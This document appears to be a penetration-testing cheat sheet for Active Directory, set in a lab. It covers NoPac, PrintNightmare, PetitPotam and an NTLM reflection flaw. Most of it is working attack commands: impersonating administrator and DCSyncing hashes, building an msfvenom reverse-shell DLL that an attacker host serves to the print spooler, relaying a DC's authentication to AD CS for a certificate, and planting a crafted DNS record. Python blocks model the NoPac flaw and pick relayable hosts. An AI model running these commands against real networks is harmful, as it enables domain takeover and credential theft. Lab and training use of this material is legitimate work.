Bleeding Edge Vulns

NoPac (CVE-2021-42278 and CVE-2021-42287)

  • Will not work if antivirus is present on the DC (the public noPac.py tooling is widely signatured)

  • Works against DCs that have not received the November 2021 updates

  • Requires a domain user account; the user must also be able to create a machine account, so ms-DS-MachineAccountQuota has to be greater than 0 (default: 10)

# NetExec check
nxc smb 172.16.5.5 -u 'john' -p 'pass123' -M nopac

# Check (scanner.py from the noPac repo)
python scanner.py example.local/john:pass123 -dc-ip 172.16.5.5 -use-ldap

# Shell as the impersonated user on the DC
python noPac.py example.local/john:pass123 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap

# DCSync (dumps only the administrator account's secrets)
python noPac.py example.local/john:pass123 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user example/administrator
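The reason the commands above yield a ticket for the DC is a name-resolution quirk in the KDC. The following is an added illustration, not code from noPac.py, impacket or the page: it models the directory and the KDC in memory (constructed data, lab names borrowed from the commands above) and collapses the two CVEs into the two checks the November 2021 patch added, so you can see which step the patch breaks.

```python
# Added illustration of the NoPac mechanism; NOT code from noPac.py or impacket.
# Directory, KDC and passwords below are an in-memory model (constructed data).

MACHINE_ACCOUNT_QUOTA = 10  # AD default for ms-DS-MachineAccountQuota


class Directory:
    """Tiny stand-in for the AD database (sAMAccountName -> password)."""

    def __init__(self, patched: bool):
        self.patched = patched
        self.accounts = {"ACADEMY-EA-DC01$": "dc-machine-key", "john": "pass123"}
        self.created_by = {}  # machine account -> domain user who created it

    def add_computer(self, creator: str, name: str, password: str) -> None:
        """Any domain user may create up to MachineAccountQuota computer objects."""
        owned = sum(1 for c in self.created_by.values() if c == creator)
        if owned >= MACHINE_ACCOUNT_QUOTA:
            raise PermissionError("ms-DS-MachineAccountQuota exhausted")
        if not name.endswith("$") or name in self.accounts:
            raise ValueError("computer sAMAccountName must end with '$' and be unique")
        self.accounts[name] = password
        self.created_by[name] = creator

    def rename(self, old: str, new: str) -> None:
        """CVE-2021-42278: before the patch the creator could drop the trailing '$'."""
        if self.patched and not new.endswith("$"):
            raise PermissionError("patched DC: computer sAMAccountName must end with '$'")
        if new in self.accounts:
            raise ValueError("sAMAccountName already in use")
        self.accounts[new] = self.accounts.pop(old)
        self.created_by[new] = self.created_by.pop(old)


class KDC:
    """Stand-in for the KDC name resolution that S4U2self relies on."""

    def __init__(self, directory: Directory):
        self.d = directory

    def as_req(self, cname: str, password: str) -> dict:
        """TGT issuance: the ticket carries exactly the cname that was requested."""
        if self.d.accounts.get(cname) != password:
            raise PermissionError("KDC_ERR_PREAUTH_FAILED")
        return {"cname": cname}

    def resolve(self, cname: str) -> str:
        """CVE-2021-42287: if cname does not exist, an unpatched KDC retries with '$' appended."""
        if cname in self.d.accounts:
            return cname
        if not self.d.patched and cname + "$" in self.d.accounts:
            return cname + "$"
        raise LookupError("KDC_ERR_C_PRINCIPAL_UNKNOWN")

    def s4u2self(self, tgt: dict, impersonate: str) -> dict:
        """Service ticket for `impersonate` to whichever account the TGT's cname resolves to."""
        owner = self.resolve(tgt["cname"])
        return {"service_account": owner, "client": impersonate}


def nopac(patched: bool) -> str:
    """Run the NoPac steps against the model DC; returns the account the final ST is issued for."""
    d = Directory(patched)
    kdc = KDC(d)
    d.add_computer("john", "FAKE$", "Fake123")        # 1. addcomputer (needs MAQ > 0)
    d.rename("FAKE$", "ACADEMY-EA-DC01")              # 2. drop the '$' (blocked on a patched DC)
    tgt = kdc.as_req("ACADEMY-EA-DC01", "Fake123")    # 3. TGT whose cname is the DC's own name
    d.rename("ACADEMY-EA-DC01", "FAKE$")              # 4. rename back so that cname no longer exists
    st = kdc.s4u2self(tgt, "administrator")           # 5. KDC falls back to ACADEMY-EA-DC01$
    return st["service_account"]


if __name__ == "__main__":
    print("unpatched DC issues the ST for:", nopac(False))
    try:
        nopac(True)
    except PermissionError as exc:
        print("patched DC:", exc)
```

On an unpatched model the S4U2self ticket ends up bound to ACADEMY-EA-DC01$, which is why noPac.py can then open a shell or DCSync as administrator; on the patched model step 2 is refused, and even if it were not, the KDC would no longer append the '$'.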

PrintNightmare (CVE-2021-34527 and CVE-2021-1675)

  • Affects Windows builds that have not received the July 2021 updates

  • The Print Spooler service must be running on the target

  • Requires a domain user account

# NetExec check
nxc smb 172.16.5.5 -u '' -p '' -M printnightmare

# Print Spooler check: the MS-RPRN / MS-PAR interfaces are only exposed while spoolsv.exe is running
impacket-rpcdump @172.16.5.5 | egrep 'MS-RPRN|MS-PAR'

# Reverse shell DLL, hosted on an SMB share the target can reach (start a listener on 172.16.5.225:8080 before exploiting)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.16.5.225 LPORT=8080 -f dll > backupscript.dll
impacket-smbserver -smb2support CompData .

# Exploit: the spooler loads the DLL from the UNC path as SYSTEM
python CVE-2021-1675.py example.local/john:'pass123'@172.16.5.5 '\\172.16.5.225\CompData\backupscript.dll'

PetitPotam (CVE-2021-36942)

  • Patched August 2021

  • No domain user account required: the EFSRPC coercion works unauthenticated against an unpatched DC

  • Needs an AD CS web enrollment endpoint (certsrv) that accepts NTLM over HTTP as the relay target

# NetExec check (the target is the DC, not the attacker host)
nxc smb 172.16.5.5 -u '' -p '' -M coerce_plus -o METHOD=PetitPotam

# Start the relay to the CA's web enrollment first; the relayed DC$ authentication is turned into a DomainController-template certificate
impacket-ntlmrelayx -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController

# Coerce the DC: PetitPotam.py <listener (attacker)> <target (DC)>
python PetitPotam.py 172.16.5.225 172.16.5.5

# Get a TGT for DC01$ via PKINIT with the base64 PFX printed by ntlmrelayx (the base64 here is truncated), then DCSync with the ccache
python PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 MIIStQIBAzCCEn8GCSqGS dc01.ccache
export KRB5CCNAME=dc01.ccache
impacket-secretsdump -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL


# Alternative: recover the DC01$ NT hash with the AS-REP encryption key printed by gettgtpkinit.py (UnPAC-the-hash), then DCSync with -hashes
python PKINITtools/getnthash.py -key 70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275 INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$

impacket-secretsdump -just-dc-user INLANEFREIGHT/administrator "ACADEMY-EA-DC01$"@172.16.5.5 -hashes :313b6f423cd1ee07e91315b4919fb4ba

NTLM Reflection (CVE-2025-33073)

  • Patched June 2025

  • Requires a domain user account (to create the DNS record) and a target with SMB signing disabled

  • The record name is "localhost" followed by a marshalled target-info suffix: the coerced host ends up authenticating as if to itself, which is what defeats the built-in reflection protections

# SMB signing must be disabled on the target
nxc smb <SUBNET>

# Add our DNS record (krbrelayx dnstool.py) pointing the crafted name at the attacker; allow a few minutes for it to become resolvable
python dnstool.py -u 'domain.local\john' -p 'pass123' -force-ssl --forest -port 636 -a add -r localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d <ATTACKER_IP> <DC_IP>
# Verify the record
python dnstool.py -u 'domain.local\john' -p 'pass123' -force-ssl --forest -port 636 -a query -r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' <DC_IP>

# Relay the coerced authentication back to the same host it came from
impacket-ntlmrelayx -t <TARGET_IP> -smb2support
# Coerce the target with the crafted name as the listener: PetitPotam.py <listener> <target>
python PetitPotam.py -u john -p pass123 -d domain.local localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA <TARGET_HOSTNAME>
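Picking the <TARGET_IP> and <TARGET_HOSTNAME> for the steps above means reading the signing flag out of the nxc sweep. The following is an added example, not part of the page or of NetExec: it parses the per-host banner lines nxc prints, keeps only hosts with signing disabled, and builds the FQDN PetitPotam.py needs. The sample output is constructed (lab names from this page; the non-DC IPs are assumptions).

```python
import re

# Constructed sample of `nxc smb <SUBNET>` output (not real scan results).
SAMPLE_NXC = """\
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [*] Windows Server 2019 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB         172.16.5.130    445    ACADEMY-EA-FILE  [*] Windows Server 2019 Build 17763 x64 (name:ACADEMY-EA-FILE) (domain:INLANEFREIGHT.LOCAL) (signing:False) (SMBv1:False)
SMB         172.16.5.35     445    ACADEMY-EA-MS01  [*] Windows 10.0 Build 19041 x64 (name:ACADEMY-EA-MS01) (domain:INLANEFREIGHT.LOCAL) (signing:False) (SMBv1:True)
"""

# One nxc banner line: protocol, ip, port, hostname, then the (key:value) fields.
LINE_RE = re.compile(
    r"^SMB\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+\d+\s+(?P<host>\S+)\s+.*?"
    r"\(domain:(?P<domain>[^)]+)\).*?\(signing:(?P<signing>True|False)\)"
)


def parse_nxc(output: str) -> list[dict]:
    """Parse nxc banner lines; lines that are not host banners are ignored."""
    hosts = []
    for line in output.splitlines():
        m = LINE_RE.match(line)
        if m:
            hosts.append({
                "ip": m["ip"],
                "host": m["host"],
                "fqdn": f"{m['host']}.{m['domain']}",   # <TARGET_HOSTNAME> for PetitPotam.py
                "signing": m["signing"] == "True",
            })
    return hosts


def relay_targets(output: str) -> list[dict]:
    """Only hosts that accept unsigned SMB can receive relayed (or reflected) NTLM authentication."""
    return [h for h in parse_nxc(output) if not h["signing"]]


if __name__ == "__main__":
    for h in relay_targets(SAMPLE_NXC):
        print(f"{h['ip']:<15} {h['fqdn']}  signing disabled -> relayable")
```

A host that shows signing:True (the DC in the sample) is not a viable target for this technique, even if the coercion itself succeeds.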
